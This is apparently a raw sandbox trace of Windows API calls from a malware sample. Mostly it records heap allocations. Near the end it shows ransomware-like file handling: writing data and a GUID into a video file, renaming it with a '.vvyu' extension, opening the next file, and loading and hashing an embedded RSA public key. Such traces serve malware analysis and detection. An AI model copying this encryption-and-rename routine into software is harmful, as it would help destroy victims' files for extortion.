[0190.644] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bd70 [0190.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0190.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bb0 | out: hHeap=0x6a0000) returned 1 [0190.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bc8 | out: hHeap=0x6a0000) returned 1 [0190.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c10 | out: hHeap=0x6a0000) returned 1 [0190.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0190.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c10 [0190.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0190.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39bc8 [0190.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0190.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39bb0 [0190.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0190.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0190.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0190.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0190.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0190.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0190.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0190.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0190.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0190.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bc8 | out: hHeap=0x6a0000) returned 1 [0190.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0190.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bb0 | out: hHeap=0x6a0000) returned 1 [0190.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0190.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0190.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c10 | out: hHeap=0x6a0000) returned 1 [0190.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0190.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0190.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bd70 | out: hHeap=0x6a0000) returned 1 [0190.647] GetCurrentThreadId () returned 0x264 [0190.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0190.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d44870 [0190.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0190.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0190.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0190.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0190.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0190.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0190.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.647] GetCurrentThreadId () returned 0x264 [0190.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.648] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0190.648] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.648] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0190.649] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0190.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0190.649] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82d20 [0190.649] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0190.649] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0190.649] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0190.649] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c10 [0190.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0190.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0190.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0190.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0190.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0190.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0190.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0190.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0190.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39bb0 [0190.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0190.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0190.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0190.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0190.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0190.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0190.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0190.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39bc8 [0190.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0190.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0190.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0190.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b98 [0190.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0190.651] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39c28 [0190.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0190.651] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0190.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0190.651] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39bf8 [0190.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0190.651] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39be0 [0190.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0190.651] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39c40 [0190.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39be0 | out: hHeap=0x6a0000) returned 1 [0190.651] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39be0 [0190.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bf8 | out: hHeap=0x6a0000) returned 1 [0190.651] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0190.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0190.651] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0190.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0190.651] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0190.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bb0 | out: hHeap=0x6a0000) returned 1 [0190.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39bb0 [0190.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0190.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0190.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c10 | out: hHeap=0x6a0000) returned 1 [0190.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0190.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c40 | out: hHeap=0x6a0000) returned 1 [0190.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0190.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0190.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0190.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0190.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0190.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bb0 | out: hHeap=0x6a0000) returned 1 [0190.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0190.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0190.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0190.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0190.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0190.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0190.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0190.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0190.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0190.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0190.655] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0190.655] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0190.655] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0190.655] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39be0 | out: hHeap=0x6a0000) returned 1 [0190.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0190.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c28 | out: hHeap=0x6a0000) returned 1 [0190.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0190.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bc8 | out: hHeap=0x6a0000) returned 1 [0190.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b98 | out: hHeap=0x6a0000) returned 1 [0190.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0190.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0190.657] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0190.657] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b80 | out: hHeap=0x6a0000) returned 1 [0190.657] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30b50 | out: hHeap=0x6a0000) returned 1 [0190.657] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0190.658] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0190.658] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.658] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0190.658] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0190.658] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0190.658] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0190.659] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0190.659] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0190.660] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0190.660] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0190.660] WriteFile (in: hFile=0x584, lpBuffer=0x2d45778*, nNumberOfBytesToWrite=0x10679, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d45778*, lpNumberOfBytesWritten=0x30ffb14*=0x10679, lpOverlapped=0x0) returned 1 [0190.661] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0190.661] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x1067e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.661] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0190.662] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0190.662] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0190.662] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0190.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0190.662] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0190.662] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0190.663] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0190.663] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0190.663] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.663] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0190.663] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0190.663] CloseHandle (hObject=0x584) returned 1 [0190.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0190.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x890) returned 0x2d45778 [0190.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0190.669] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\tosxRVQraIGf3MknOm0.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\tosxrvqraigf3mknom0.avi"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\tosxRVQraIGf3MknOm0.avi.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\tosxrvqraigf3mknom0.avi.vvyu")) returned 1 [0190.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0190.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0190.672] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea810 | out: hHeap=0x6a0000) returned 1 [0190.676] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbe2b730, ftCreationTime.dwHighDateTime=0x1d8993c, ftLastAccessTime.dwLowDateTime=0x793006a0, ftLastAccessTime.dwHighDateTime=0x1d89cd4, ftLastWriteTime.dwLowDateTime=0x793006a0, ftLastWriteTime.dwHighDateTime=0x1d89cd4, nFileSizeHigh=0x0, nFileSizeLow=0x137f0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZTLjJZckd4eCj5.mkv", cAlternateFileName="ZTLJJZ~1.MKV")) returned 1 [0190.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea810 [0190.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.676] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\ZTLjJZckd4eCj5.mkv") returned=".mkv" [0190.676] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\ZTLjJZckd4eCj5.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\ztljjzckd4ecj5.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0190.677] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=79856) returned 1 [0190.677] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0190.679] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x137ca, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.679] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0190.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0190.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0190.682] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.682] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x137f0, lpOverlapped=0x0) returned 1 [0190.683] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0190.683] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.683] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.683] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6e9a40) returned 1 [0190.685] CryptCreateHash (in: hProv=0x6e9a40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0190.685] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0190.685] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0190.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0190.685] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0190.685] GetLastError () returned 0x0 [0190.685] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0190.685] CryptReleaseContext (hProv=0x6e9a40, dwFlags=0x0) returned 1 [0190.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 